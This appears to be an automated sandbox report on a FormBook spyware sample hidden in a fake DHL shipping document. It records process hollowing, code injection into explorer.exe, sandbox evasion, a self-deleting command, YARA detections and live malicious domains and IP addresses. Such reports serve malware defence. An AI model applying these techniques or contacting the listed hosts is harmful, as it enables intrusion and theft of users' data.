          Source: C:\Users\Public\vbc.exeCode function: 11_1_0041B40B push eax; ret
          Source: C:\Windows\explorer.exeCode function: 13_2_02941030 push eax; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49490680745
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49490680745
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000000D85E4 second address: 00000000000D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000000D897E second address: 00000000000D8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00229B80 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2800Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2356Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: explorer.exe, 0000000D.00000000.2119208514.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000D.00000000.2111689374.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000D.00000000.2119208514.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000D.00000000.2111711384.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00229B80 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 11_2_00409B20 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00220042 push dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 9_2_03F28E2B push dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 11_2_007426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 14_2_020D26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeDomain query: www.nevomo.group
          Contains functionality to inject code into remote processesShow sources
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: C90000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 0000000D.00000000.2113569226.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000D.00000000.2113569226.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000D.00000000.2111689374.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000D.00000000.2113569226.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection712Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection712Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing13Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Connections Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery13Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383965 Sample: DHL Shipping doc & Shipment... Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 9 other signatures 2->54 10 EQNEDT32.EXE 12 2->10         started        14 WINWORD.EXE 302 58 2->14         started        process3 dnsIp4 32 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 68 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->68 17 vbc.exe 10->17         started        38 23.95.122.24, 49167, 49168, 49169 AS-COLOCROSSINGUS United States 14->38 file5 signatures6 process7 signatures8 40 Multi AV Scanner detection for dropped file 17->40 42 Detected unpacking (changes PE section rights) 17->42 44 Machine Learning detection for dropped file 17->44 46 3 other signatures 17->46 20 vbc.exe 17->20         started        process9 signatures10 56 Modifies the context of a thread in another process (thread injection) 20->56 58 Maps a DLL or memory area into another process 20->58 60 Sample uses process hollowing technique 20->60 62 Queues an APC in another process (thread injection) 20->62 23 explorer.exe 20->23 injected process11 dnsIp12 36 www.nevomo.group 213.186.33.5, 49173, 80 OVHFR France 23->36 64 System process connects to network (likely due to code injection or exploit) 23->64 66 Uses netstat to query active network connections and open ports 23->66 27 NETSTAT.EXE 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL Shipping doc & Shipment tracking details.docx5%VirustotalBrowse
          DHL Shipping doc & Shipment tracking details.docx0%ReversingLabs

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe42%ReversingLabsWin32.Spyware.Noon
          C:\Users\Public\vbc.exe42%ReversingLabsWin32.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          14.2.NETSTAT.EXE.2647960.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          11.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.2.NETSTAT.EXE.2c19a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.nevomo.group0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%VirustotalBrowse
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%VirustotalBrowse
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          www.scott-re.online/nnmd/100%Avira URL Cloudmalware
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
